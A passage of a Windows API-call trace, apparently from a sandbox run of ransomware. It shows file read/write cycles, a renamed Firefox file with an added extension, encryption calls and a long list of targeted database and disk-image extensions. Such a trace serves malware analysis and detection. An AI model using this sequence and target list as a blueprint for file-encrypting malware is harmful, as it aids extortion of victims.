hFile=0x6c4, liDistanceToMove=0xfff416b4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0140.003] WriteFile (in: hFile=0x6c4, lpBuffer=0x4b20000*, nNumberOfBytesToWrite=0xbe94c, lpNumberOfBytesWritten=0x397fc2c, lpOverlapped=0x0 | out: lpBuffer=0x4b20000*, lpNumberOfBytesWritten=0x397fc2c*=0xbe94c, lpOverlapped=0x0) returned 1 [0140.007] SetFilePointerEx (in: hFile=0x6c4, liDistanceToMove=0xbe94c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0140.007] ReadFile (in: hFile=0x6c4, lpBuffer=0x4b20000, nNumberOfBytesToRead=0xbe94c, lpNumberOfBytesRead=0x397fc80, lpOverlapped=0x0 | out: lpBuffer=0x4b20000*, lpNumberOfBytesRead=0x397fc80*=0xbe94c, lpOverlapped=0x0) returned 1 [0140.074] SetFilePointerEx (in: hFile=0x6c4, liDistanceToMove=0xfff416b4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0140.074] WriteFile (in: hFile=0x6c4, lpBuffer=0x4b20000*, nNumberOfBytesToWrite=0xbe94c, lpNumberOfBytesWritten=0x397fc2c, lpOverlapped=0x0 | out: lpBuffer=0x4b20000*, lpNumberOfBytesWritten=0x397fc2c*=0xbe94c, lpOverlapped=0x0) returned 1 [0140.080] SetFilePointerEx (in: hFile=0x6c4, liDistanceToMove=0xbe94c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0140.080] ReadFile (in: hFile=0x6c4, lpBuffer=0x4b20000, nNumberOfBytesToRead=0xbe94c, lpNumberOfBytesRead=0x397fc80, lpOverlapped=0x0 | out: lpBuffer=0x4b20000*, lpNumberOfBytesRead=0x397fc80*=0xbe94c, lpOverlapped=0x0) returned 1 [0140.129] SetFilePointerEx (in: hFile=0x6c4, liDistanceToMove=0xfff416b4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0140.130] WriteFile (in: hFile=0x6c4, lpBuffer=0x4b20000*, nNumberOfBytesToWrite=0xbe94c, lpNumberOfBytesWritten=0x397fc2c, lpOverlapped=0x0 | out: lpBuffer=0x4b20000*, lpNumberOfBytesWritten=0x397fc2c*=0xbe94c, lpOverlapped=0x0) returned 1 [0140.133] SetFilePointerEx (in: hFile=0x6c4, liDistanceToMove=0xbe94c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0140.133] ReadFile (in: hFile=0x6c4, lpBuffer=0x4b20000, nNumberOfBytesToRead=0xbe94c, lpNumberOfBytesRead=0x397fc80, lpOverlapped=0x0 | out: lpBuffer=0x4b20000*, lpNumberOfBytesRead=0x397fc80*=0xbe94c, lpOverlapped=0x0) returned 1 [0140.163] SetFilePointerEx (in: hFile=0x6c4, liDistanceToMove=0xfff416b4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0140.163] WriteFile (in: hFile=0x6c4, lpBuffer=0x4b20000*, nNumberOfBytesToWrite=0xbe94c, lpNumberOfBytesWritten=0x397fc2c, lpOverlapped=0x0 | out: lpBuffer=0x4b20000*, lpNumberOfBytesWritten=0x397fc2c*=0xbe94c, lpOverlapped=0x0) returned 1 [0140.169] SetFilePointerEx (in: hFile=0x6c4, liDistanceToMove=0xbe94c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0140.169] ReadFile (in: hFile=0x6c4, lpBuffer=0x4b20000, nNumberOfBytesToRead=0xbe94c, lpNumberOfBytesRead=0x397fc80, lpOverlapped=0x0 | out: lpBuffer=0x4b20000*, lpNumberOfBytesRead=0x397fc80*=0xbe94c, lpOverlapped=0x0) returned 1 [0140.250] SetFilePointerEx (in: hFile=0x6c4, liDistanceToMove=0xfff416b4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0140.250] WriteFile (in: hFile=0x6c4, lpBuffer=0x4b20000*, nNumberOfBytesToWrite=0xbe94c, lpNumberOfBytesWritten=0x397fc2c, lpOverlapped=0x0 | out: lpBuffer=0x4b20000*, lpNumberOfBytesWritten=0x397fc2c*=0xbe94c, lpOverlapped=0x0) returned 1 [0140.254] CloseHandle (hObject=0x6c4) returned 1 [0140.681] GetProcessHeap () returned 0xea0000 [0140.681] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x8, Size=0x7fd7) returned 0xef34d0 [0140.681] lstrcpyW (in: lpString1=0xef34d0, lpString2="C:\\Program Files (x86)\\Mozilla Firefox\\omni.ja" | out: lpString1="C:\\Program Files (x86)\\Mozilla Firefox\\omni.ja") returned="C:\\Program Files (x86)\\Mozilla Firefox\\omni.ja" [0140.681] lstrcatW (in: lpString1="C:\\Program Files (x86)\\Mozilla Firefox\\omni.ja", lpString2=".UAKXC" | out: lpString1="C:\\Program Files (x86)\\Mozilla Firefox\\omni.ja.UAKXC") returned="C:\\Program Files (x86)\\Mozilla Firefox\\omni.ja.UAKXC" [0140.681] MoveFileW (lpExistingFileName="C:\\Program Files (x86)\\Mozilla Firefox\\omni.ja" (normalized: "c:\\program files (x86)\\mozilla firefox\\omni.ja"), lpNewFileName="C:\\Program Files (x86)\\Mozilla Firefox\\omni.ja.UAKXC" (normalized: "c:\\program files (x86)\\mozilla firefox\\omni.ja.uakxc")) returned 1 [0140.682] GetProcessHeap () returned 0xea0000 [0140.682] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef34d0 | out: hHeap=0xea0000) returned 1 [0140.682] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec3c0 | out: hHeap=0xea0000) returned 1 [0140.682] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeecfe0 | out: hHeap=0xea0000) returned 1 [0140.682] CryptGenRandom (in: hProv=0xecf568, dwLen=0x20, pbBuffer=0x397fd50 | out: pbBuffer=0x397fd50) returned 1 [0140.683] CryptGenRandom (in: hProv=0xecf568, dwLen=0x8, pbBuffer=0x397fd48 | out: pbBuffer=0x397fd48) returned 1 [0140.683] CryptEncrypt (in: hKey=0xecf820, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x397fd70*, pdwDataLen=0x397fc8c*=0x28, dwBufLen=0x20c | out: pbData=0x397fd70*, pdwDataLen=0x397fc8c*=0x200) returned 1 [0140.683] GetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft Help\\Hx.hxn" (normalized: "c:\\programdata\\microsoft help\\hx.hxn")) returned 0x2022 [0140.684] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft Help\\Hx.hxn" (normalized: "c:\\programdata\\microsoft help\\hx.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6c4 [0140.684] GetLastError () returned 0x0 [0140.684] GetFileSizeEx (in: hFile=0x6c4, lpFileSize=0x397fc88 | out: lpFileSize=0x397fc88*=390) returned 1 [0140.684] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\Hx.hxn", lpSrch=".4dd") returned 0x0 [0140.684] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\Hx.hxn", lpSrch=".4dl") returned 0x0 [0140.684] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\Hx.hxn", lpSrch=".accdb") returned 0x0 [0140.685] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\Hx.hxn", lpSrch=".accdc") returned 0x0 [0140.685] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\Hx.hxn", lpSrch=".accde") returned 0x0 [0140.685] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\Hx.hxn", lpSrch=".accdr") returned 0x0 [0140.685] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\Hx.hxn", lpSrch=".accdt") returned 0x0 [0140.685] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\Hx.hxn", lpSrch=".accft") returned 0x0 [0140.685] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\Hx.hxn", lpSrch=".adb") returned 0x0 [0140.685] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\Hx.hxn", lpSrch=".ade") returned 0x0 [0140.685] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\Hx.hxn", lpSrch=".adf") returned 0x0 [0140.685] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\Hx.hxn", lpSrch=".adp") returned 0x0 [0140.685] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\Hx.hxn", lpSrch=".arc") returned 0x0 [0140.685] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\Hx.hxn", lpSrch=".ora") returned 0x0 [0140.685] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\Hx.hxn", lpSrch=".alf") returned 0x0 [0140.685] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\Hx.hxn", lpSrch=".ask") returned 0x0 [0140.685] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\Hx.hxn", lpSrch=".btr") returned 0x0 [0140.685] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\Hx.hxn", lpSrch=".bdf") returned 0x0 [0140.685] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\Hx.hxn", lpSrch=".cat") returned 0x0 [0140.685] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\Hx.hxn", lpSrch=".cdb") returned 0x0 [0140.685] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\Hx.hxn", lpSrch=".ckp") returned 0x0 [0140.686] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\Hx.hxn", lpSrch=".cma") returned 0x0 [0140.686] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\Hx.hxn", lpSrch=".cpd") returned 0x0 [0140.686] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\Hx.hxn", lpSrch=".dacpac") returned 0x0 [0140.686] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\Hx.hxn", lpSrch=".dad") returned 0x0 [0140.686] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\Hx.hxn", lpSrch=".dadiagrams") returned 0x0 [0140.686] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\Hx.hxn", lpSrch=".daschema") returned 0x0 [0140.686] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\Hx.hxn", lpSrch=".db") returned 0x0 [0140.686] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\Hx.hxn", lpSrch=".db-shm") returned 0x0 [0140.686] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\Hx.hxn", lpSrch=".db-wal") returned 0x0 [0140.686] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\Hx.hxn", lpSrch=".db3") returned 0x0 [0140.686] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\Hx.hxn", lpSrch=".dbc") returned 0x0 [0140.686] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\Hx.hxn", lpSrch=".dbf") returned 0x0 [0140.686] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\Hx.hxn", lpSrch=".dbs") returned 0x0 [0140.686] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\Hx.hxn", lpSrch=".dbt") returned 0x0 [0140.686] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\Hx.hxn", lpSrch=".dbv") returned 0x0 [0140.686] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\Hx.hxn", lpSrch=".dbx") returned 0x0 [0140.686] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\Hx.hxn", lpSrch=".dcb") returned 0x0 [0140.687] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\Hx.hxn", lpSrch=".dct") returned 0x0 [0140.687] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\Hx.hxn", lpSrch=".dcx") returned 0x0 [0140.687] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\Hx.hxn", lpSrch=".ddl") returned 0x0 [0140.687] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\Hx.hxn", lpSrch=".dlis") returned 0x0 [0140.687] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\Hx.hxn", lpSrch=".dp1") returned 0x0 [0140.687] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\Hx.hxn", lpSrch=".dqy") returned 0x0 [0140.687] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\Hx.hxn", lpSrch=".dsk") returned 0x0 [0140.687] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\Hx.hxn", lpSrch=".dsn") returned 0x0 [0140.687] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\Hx.hxn", lpSrch=".dtsx") returned 0x0 [0140.687] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\Hx.hxn", lpSrch=".dxl") returned 0x0 [0140.687] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\Hx.hxn", lpSrch=".eco") returned 0x0 [0140.687] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\Hx.hxn", lpSrch=".ecx") returned 0x0 [0140.687] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\Hx.hxn", lpSrch=".edb") returned 0x0 [0140.687] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\Hx.hxn", lpSrch=".epim") returned 0x0 [0140.687] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\Hx.hxn", lpSrch=".exb") returned 0x0 [0140.687] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\Hx.hxn", lpSrch=".fcd") returned 0x0 [0140.687] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\Hx.hxn", lpSrch=".fdb") returned 0x0 [0140.687] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\Hx.hxn", lpSrch=".fic") returned 0x0 [0140.687] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\Hx.hxn", lpSrch=".fmp") returned 0x0 [0140.687] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\Hx.hxn", lpSrch=".fmp12") returned 0x0 [0140.687] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\Hx.hxn", lpSrch=".fmpsl") returned 0x0 [0140.687] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\Hx.hxn", lpSrch=".fol") returned 0x0 [0140.688] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\Hx.hxn", lpSrch=".fp3") returned 0x0 [0140.688] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\Hx.hxn", lpSrch=".fp4") returned 0x0 [0140.688] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\Hx.hxn", lpSrch=".fp5") returned 0x0 [0140.688] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\Hx.hxn", lpSrch=".fp7") returned 0x0 [0140.688] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\Hx.hxn", lpSrch=".fpt") returned 0x0 [0140.688] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\Hx.hxn", lpSrch=".frm") returned 0x0 [0140.688] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\Hx.hxn", lpSrch=".gdb") returned 0x0 [0140.688] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\Hx.hxn", lpSrch=".grdb") returned 0x0 [0140.688] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\Hx.hxn", lpSrch=".gwi") returned 0x0 [0140.688] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\Hx.hxn", lpSrch=".hdb") returned 0x0 [0140.688] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\Hx.hxn", lpSrch=".his") returned 0x0 [0140.688] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\Hx.hxn", lpSrch=".ib") returned 0x0 [0140.688] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\Hx.hxn", lpSrch=".idb") returned 0x0 [0140.688] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\Hx.hxn", lpSrch=".ihx") returned 0x0 [0140.688] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\Hx.hxn", lpSrch=".itdb") returned 0x0 [0140.688] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\Hx.hxn", lpSrch=".itw") returned 0x0 [0140.688] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\Hx.hxn", lpSrch=".jet") returned 0x0 [0140.688] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\Hx.hxn", lpSrch=".jtx") returned 0x0 [0140.688] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\Hx.hxn", lpSrch=".kdb") returned 0x0 [0140.688] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\Hx.hxn", lpSrch=".kexi") returned 0x0 [0140.688] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\Hx.hxn", lpSrch=".kexic") returned 0x0 [0140.688] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\Hx.hxn", lpSrch=".kexis") returned 0x0 [0140.689] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\Hx.hxn", lpSrch=".lgc") returned 0x0 [0140.689] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\Hx.hxn", lpSrch=".lwx") returned 0x0 [0140.689] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\Hx.hxn", lpSrch=".maf") returned 0x0 [0140.689] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\Hx.hxn", lpSrch=".maq") returned 0x0 [0140.689] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\Hx.hxn", lpSrch=".mar") returned 0x0 [0140.689] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\Hx.hxn", lpSrch=".mas") returned 0x0 [0140.689] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\Hx.hxn", lpSrch=".mav") returned 0x0 [0140.689] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\Hx.hxn", lpSrch=".mdb") returned 0x0 [0140.689] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\Hx.hxn", lpSrch=".mdf") returned 0x0 [0140.689] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\Hx.hxn", lpSrch=".mpd") returned 0x0 [0140.689] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\Hx.hxn", lpSrch=".mrg") returned 0x0 [0140.689] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\Hx.hxn", lpSrch=".mud") returned 0x0 [0140.689] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\Hx.hxn", lpSrch=".mwb") returned 0x0 [0140.689] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\Hx.hxn", lpSrch=".myd") returned 0x0 [0140.689] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\Hx.hxn", lpSrch=".ndf") returned 0x0 [0140.689] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\Hx.hxn", lpSrch=".nnt") returned 0x0 [0140.689] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\Hx.hxn", lpSrch=".nrmlib") returned 0x0 [0140.689] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\Hx.hxn", lpSrch=".ns2") returned 0x0 [0140.689] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\Hx.hxn", lpSrch=".ns3") returned 0x0 [0140.689] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\Hx.hxn", lpSrch=".ns4") returned 0x0 [0140.689] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\Hx.hxn", lpSrch=".nsf") returned 0x0 [0140.689] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\Hx.hxn", lpSrch=".nv") returned 0x0 [0140.690] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\Hx.hxn", lpSrch=".nv2") returned 0x0 [0140.690] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\Hx.hxn", lpSrch=".nwdb") returned 0x0 [0140.690] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\Hx.hxn", lpSrch=".nyf") returned 0x0 [0140.690] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\Hx.hxn", lpSrch=".odb") returned 0x0 [0140.690] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\Hx.hxn", lpSrch=".oqy") returned 0x0 [0140.690] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\Hx.hxn", lpSrch=".orx") returned 0x0 [0140.690] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\Hx.hxn", lpSrch=".owc") returned 0x0 [0140.690] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\Hx.hxn", lpSrch=".p96") returned 0x0 [0140.690] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\Hx.hxn", lpSrch=".p97") returned 0x0 [0140.690] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\Hx.hxn", lpSrch=".pan") returned 0x0 [0140.690] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\Hx.hxn", lpSrch=".pdb") returned 0x0 [0140.690] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\Hx.hxn", lpSrch=".pdm") returned 0x0 [0140.690] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\Hx.hxn", lpSrch=".pnz") returned 0x0 [0140.690] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\Hx.hxn", lpSrch=".qry") returned 0x0 [0140.690] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\Hx.hxn", lpSrch=".qvd") returned 0x0 [0140.690] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\Hx.hxn", lpSrch=".rbf") returned 0x0 [0140.690] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\Hx.hxn", lpSrch=".rctd") returned 0x0 [0140.690] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\Hx.hxn", lpSrch=".rod") returned 0x0 [0140.690] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\Hx.hxn", lpSrch=".rodx") returned 0x0 [0140.690] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\Hx.hxn", lpSrch=".rpd") returned 0x0 [0140.690] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\Hx.hxn", lpSrch=".rsd") returned 0x0 [0140.690] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\Hx.hxn", lpSrch=".sas7bdat") returned 0x0 [0140.691] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\Hx.hxn", lpSrch=".sbf") returned 0x0 [0140.691] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\Hx.hxn", lpSrch=".scx") returned 0x0 [0140.691] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\Hx.hxn", lpSrch=".sdb") returned 0x0 [0140.691] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\Hx.hxn", lpSrch=".sdc") returned 0x0 [0140.691] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\Hx.hxn", lpSrch=".sdf") returned 0x0 [0140.691] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\Hx.hxn", lpSrch=".sis") returned 0x0 [0140.691] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\Hx.hxn", lpSrch=".spq") returned 0x0 [0140.691] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\Hx.hxn", lpSrch=".sql") returned 0x0 [0140.691] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\Hx.hxn", lpSrch=".sqlite") returned 0x0 [0140.691] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\Hx.hxn", lpSrch=".sqlite3") returned 0x0 [0140.691] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\Hx.hxn", lpSrch=".sqlitedb") returned 0x0 [0140.691] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\Hx.hxn", lpSrch=".te") returned 0x0 [0140.691] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\Hx.hxn", lpSrch=".temx") returned 0x0 [0140.691] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\Hx.hxn", lpSrch=".tmd") returned 0x0 [0140.691] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\Hx.hxn", lpSrch=".tps") returned 0x0 [0140.691] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\Hx.hxn", lpSrch=".trc") returned 0x0 [0140.691] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\Hx.hxn", lpSrch=".trm") returned 0x0 [0140.691] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\Hx.hxn", lpSrch=".udb") returned 0x0 [0140.691] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\Hx.hxn", lpSrch=".udl") returned 0x0 [0140.691] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\Hx.hxn", lpSrch=".usr") returned 0x0 [0140.691] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\Hx.hxn", lpSrch=".v12") returned 0x0 [0140.691] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\Hx.hxn", lpSrch=".vis") returned 0x0 [0140.692] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\Hx.hxn", lpSrch=".vpd") returned 0x0 [0140.692] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\Hx.hxn", lpSrch=".vvv") returned 0x0 [0140.692] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\Hx.hxn", lpSrch=".wdb") returned 0x0 [0140.692] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\Hx.hxn", lpSrch=".wmdb") returned 0x0 [0140.692] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\Hx.hxn", lpSrch=".wrk") returned 0x0 [0140.692] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\Hx.hxn", lpSrch=".xdb") returned 0x0 [0140.692] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\Hx.hxn", lpSrch=".xld") returned 0x0 [0140.692] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\Hx.hxn", lpSrch=".xmlff") returned 0x0 [0140.692] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\Hx.hxn", lpSrch=".abcddb") returned 0x0 [0140.692] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\Hx.hxn", lpSrch=".abs") returned 0x0 [0140.692] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\Hx.hxn", lpSrch=".abx") returned 0x0 [0140.692] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\Hx.hxn", lpSrch=".accdw") returned 0x0 [0140.692] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\Hx.hxn", lpSrch=".adn") returned 0x0 [0140.692] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\Hx.hxn", lpSrch=".db2") returned 0x0 [0140.692] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\Hx.hxn", lpSrch=".fm5") returned 0x0 [0140.692] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\Hx.hxn", lpSrch=".hjt") returned 0x0 [0140.692] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\Hx.hxn", lpSrch=".icg") returned 0x0 [0140.692] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\Hx.hxn", lpSrch=".icr") returned 0x0 [0140.692] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\Hx.hxn", lpSrch=".kdb") returned 0x0 [0140.692] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\Hx.hxn", lpSrch=".lut") returned 0x0 [0140.692] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\Hx.hxn", lpSrch=".maw") returned 0x0 [0140.692] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\Hx.hxn", lpSrch=".mdn") returned 0x0 [0140.693] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\Hx.hxn", lpSrch=".mdt") returned 0x0 [0140.693] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\Hx.hxn", lpSrch=".vdi") returned 0x0 [0140.693] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\Hx.hxn", lpSrch=".vhd") returned 0x0 [0140.693] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\Hx.hxn", lpSrch=".vmdk") returned 0x0 [0140.693] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\Hx.hxn", 